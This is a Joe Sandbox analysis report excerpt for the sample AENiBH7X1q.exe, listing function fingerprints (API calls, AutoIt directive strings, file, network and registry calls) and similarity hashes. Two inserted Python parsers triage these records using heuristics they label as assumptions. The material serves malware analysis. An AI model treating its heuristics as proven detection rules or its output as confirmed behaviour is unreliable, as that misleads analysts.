                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d89cdb4518712ce7d497f90f16eabf25f5dd16b03f437b50de1b9ff930cdf67
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __snwprintf__wcsicoll_wcscpy
• String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
• API String ID: 1729044348-3708979750
• Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
• Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
• Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
• Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
APIs
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AENiBH7X1q.exe,?,C:\Users\user\Desktop\AENiBH7X1q.exe,004A8E80,C:\Users\user\Desktop\AENiBH7X1q.exe,0040F3D2), ref: 0040FFCA
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
• MoveFileW.KERNEL32(?,?), ref: 0044BC38
• _wcscat.LIBCMT ref: 0044BCAA
• _wcslen.LIBCMT ref: 0044BCB7
• _wcslen.LIBCMT ref: 0044BCCB
• SHFileOperationW.SHELL32 ref: 0044BD16
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
• Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
• Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
• Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
• Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
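The function records above (an "APIs" table, an optional "Strings" table, the memory-dump provenance, and a "Similarity" block of API/String/Opcode IDs and fuzzy hashes) repeat thousands of times in a report of this size, and the two records just shown are the kind an analyst wants pulled out first: one carries the `AUTOITCALLVARIABLE%d` / `CALLARGARRAY` strings, the other chains `GetFullPathNameW`, `lstrcmpiW`, `MoveFileW` and `SHFileOperationW` with a `\*.*` pattern. The parser below is an added example, not Joe Sandbox code: it reads the block format as it appears on this page into structured records and applies two triage heuristics that are this example's own assumptions (that the AutoIt marker strings identify a compiled AutoIt interpreter, and that direct calls to file-moving APIs mark functions worth reading first). The embedded sample is copied from the two records above, with the Associated lines trimmed.

```python
"""Parse Joe Sandbox function-fingerprint blocks (APIs / Similarity records)
into structured records and flag the ones worth a first look.

Added example, not Joe Sandbox code. The block format is inferred from the
report text; the triage heuristics at the bottom are assumptions of this
example, not sandbox signatures."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API line: "Func.MODULE(args), ref: ADDR" or, for CRT calls that the
# plugin prints without an argument list, "_wcscat.LIBCMT ref: ADDR".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<func>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)


@dataclass
class ApiCall:
    func: str
    module: str
    ref: int                      # call-site address from "ref:"
    args: List[str]
    subcall_of: Optional[int] = None  # set when the call sits in a callee


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    similarity: dict = field(default_factory=dict)   # "API ID", "Opcode ID", ...


def parse_blocks(text: str) -> List[FunctionRecord]:
    """Split report text into records; each record opens with an 'APIs' header."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()   # drop layout indent and bullets
        if not line:
            continue
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            section = "apis"
            continue
        if line in ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin"):
            section = line            # provenance sections are kept out of the record
            continue
        if line == "Similarity":
            section = "similarity"
            continue
        if current is None:
            continue
        if section == "apis":
            m = API_RE.match(line)
            if m:
                current.apis.append(ApiCall(
                    func=m["func"], module=m["module"], ref=int(m["ref"], 16),
                    args=[a for a in (m["args"] or "").split(",") if a],
                    subcall_of=int(m["sub"], 16) if m["sub"] else None))
        elif section == "similarity" and ": " in line:
            key, value = line.split(": ", 1)
            current.similarity[key] = value
    return records


# Assumption of this example: these strings come from the AutoIt interpreter's
# Call() implementation, so a record carrying them indicates a compiled AutoIt
# script rather than hand-written native code.
AUTOIT_MARKERS = ("AUTOITCALLVARIABLE", "CALLARGARRAY")
# Assumption: direct calls to these APIs mark the functions that relocate or
# drop files, which is where persistence and infection logic usually lives.
FS_WRITE_APIS = {"MoveFileW", "SHFileOperationW", "CreateDirectoryW", "CopyFileW"}


def triage(records: List[FunctionRecord]) -> dict:
    """Return an AutoIt flag and the (Opcode ID prefix, APIs) of file-mutating records."""
    summary = {"autoit_runtime": False, "fs_mutators": []}
    for rec in records:
        if any(m in rec.similarity.get("String ID", "") for m in AUTOIT_MARKERS):
            summary["autoit_runtime"] = True
        direct = {a.func for a in rec.apis if a.subcall_of is None}
        hits = sorted(direct & FS_WRITE_APIS)
        if hits:
            summary["fs_mutators"].append((rec.similarity.get("Opcode ID", "?")[:12], hits))
    return summary


# Constructed sample: the two records from the report above, Associated lines trimmed.
SAMPLE = r"""
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __snwprintf__wcsicoll_wcscpy
• String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
• Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
APIs
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AENiBH7X1q.exe,?,C:\Users\user\Desktop\AENiBH7X1q.exe,004A8E80,C:\Users\user\Desktop\AENiBH7X1q.exe,0040F3D2), ref: 0040FFCA
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
• MoveFileW.KERNEL32(?,?), ref: 0044BC38
• _wcscat.LIBCMT ref: 0044BCAA
• _wcslen.LIBCMT ref: 0044BCB7
• _wcslen.LIBCMT ref: 0044BCCB
• SHFileOperationW.SHELL32 ref: 0044BD16
Strings
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
"""

if __name__ == "__main__":
    recs = parse_blocks(SAMPLE)
    print(len(recs), "records;", triage(recs))
```

Running it against a full report export gives one record per function; sorting `fs_mutators` by the call-site addresses in `apis` reproduces the order in which the IDA plugin listed them, which is handy when cross-referencing the "Part of subcall function" entries with their parents.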
APIs
  • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
• _wcslen.LIBCMT ref: 004366DD
• GetFileAttributesW.KERNEL32(?), ref: 00436700
• GetLastError.KERNEL32 ref: 0043670F
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
• _wcsrchr.LIBCMT ref: 0043674C
  • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 321622961-2967466578
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
• Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
• Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
• Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
APIs
• DeleteObject.GDI32(?), ref: 0044157D
• GetDC.USER32(00000000), ref: 00441585
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
• ReleaseDC.USER32(00000000,00000000), ref: 0044159B
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
• Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
• Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
• Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
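The per-function records above all share one fixed layout: an APIs list with "Name.MODULE(args), ref: ADDR" lines (subcall lines prefixed with the parent address), an optional Strings section, Memory Dump Source lines, and a Similarity section whose String ID is a '$'-joined list of string constants. The record with API ID __wcsnicmp is worth pulling out during triage: #requireadmin, #notrayicon and #OnAutoItStartRegister are AutoIt script directives, and a native PE that compares against them is consistent with an AutoIt-compiled stub. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in that layout from a constructed sample copied from the three entries above (one line deliberately keeps the "Download File" link residue the HTML leaves behind), strips that residue, and flags AutoIt directive strings. The directive allowlist, the helper names and the record-boundary rule (a new record starts at each APIs heading) are assumptions made for the example.

```python
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed sample in the report's own layout (three records copied from the
# page; the Associated line keeps the "Download File" link text the HTML leaves).
SAMPLE = r"""
APIs
• GetLastError.KERNEL32 ref: 0043670F
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
• _wcsrchr.LIBCMT ref: 0043674C
  • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
• String ID: \
• API String ID: 321622961-2967466578
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
APIs
• DeleteObject.GDI32(?), ref: 0044157D
• GetDC.USER32(00000000), ref: 00441585
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
"""

HEADINGS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR"; subcall lines add the parent.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<addr>[0-9A-F]{8})$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")   # "Key: value" lines
# Assumption: a small allowlist of AutoIt script directives. Finding these as
# string constants inside a native PE is a strong hint of an Aut2Exe-compiled stub.
AUTOIT_DIRECTIVES = {"#requireadmin", "#notrayicon", "#onautoitstartregister"}

ApiRef = namedtuple("ApiRef", "name module args addr parent")  # parent: subcall address or None

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)     # ApiRef, in report order
    strings: list = field(default_factory=list)  # Strings section plus '$'-split String ID
    meta: dict = field(default_factory=dict)     # Source File, Associated, API ID, hashes ...

    def modules(self):
        return {a.module for a in self.apis}

def _clean(raw):
    """Drop bullets, indentation and the 'Download File' link residue."""
    line = raw.strip().lstrip("•").strip()
    return line[:-len("Download File")] if line.endswith("Download File") else line

def parse_blocks(text):
    blocks, current, section = [], None, None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line in HEADINGS:
            if line == "APIs":               # every record opens with its APIs heading
                current = FunctionBlock()
                blocks.append(current)
            section = line
        elif current is None:
            continue                         # prose before the first record
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                parent = int(m["parent"], 16) if m["parent"] else None
                current.apis.append(ApiRef(m["name"], m["module"], args, int(m["addr"], 16), parent))
        elif section == "Strings":
            current.strings.append(line)
        elif (m := KV_RE.match(line)):
            key, val = m["key"].strip(), m["val"].strip()
            if key == "Associated":          # several dumps per function
                current.meta.setdefault(key, []).append(val)
            else:
                current.meta[key] = val
            if key == "String ID" and val:   # '$'-joined string constants
                current.strings.extend(val.split("$"))
    return blocks

def autoit_directives(block):
    """String constants in this function that are AutoIt script directives."""
    return [s for s in block.strings if s.lower() in AUTOIT_DIRECTIVES]

def blocks_calling(blocks, api_name):
    """Functions (direct or via subcall) that reference the named API."""
    return [b for b in blocks if any(a.name == api_name for a in b.apis)]

if __name__ == "__main__":
    for i, b in enumerate(parse_blocks(SAMPLE)):
        print(i, sorted(b.modules()), [a.name for a in b.apis], autoit_directives(b))
```

Running the script lists, per record, the modules touched, the API names in order and any AutoIt directives found; blocks_calling is the query a triager actually wants from a report this long (for example, every function that reaches CreateDirectoryW, directly or through a subcall).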
APIs
• ___set_flsgetvalue.LIBCMT ref: 004140E1
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 004140EC
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004140FF
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
• ExitThread.KERNEL32 ref: 0041410F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00414135
                                                                                                                                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1925773019-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                                                                                                                                                                                                                                                                                                                • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                                                                                                                                                                                                                                                                                                                                                                • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00464B92
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                                                                                                                                                                                                                                                                                                                                                • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
• String ID:
• API String ID: 3424476444-0
• Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
• Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
• Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
• Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
APIs
• GetSystemMetrics.USER32(0000000F), ref: 00440B7B
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
• Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
• Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
• Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
• Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
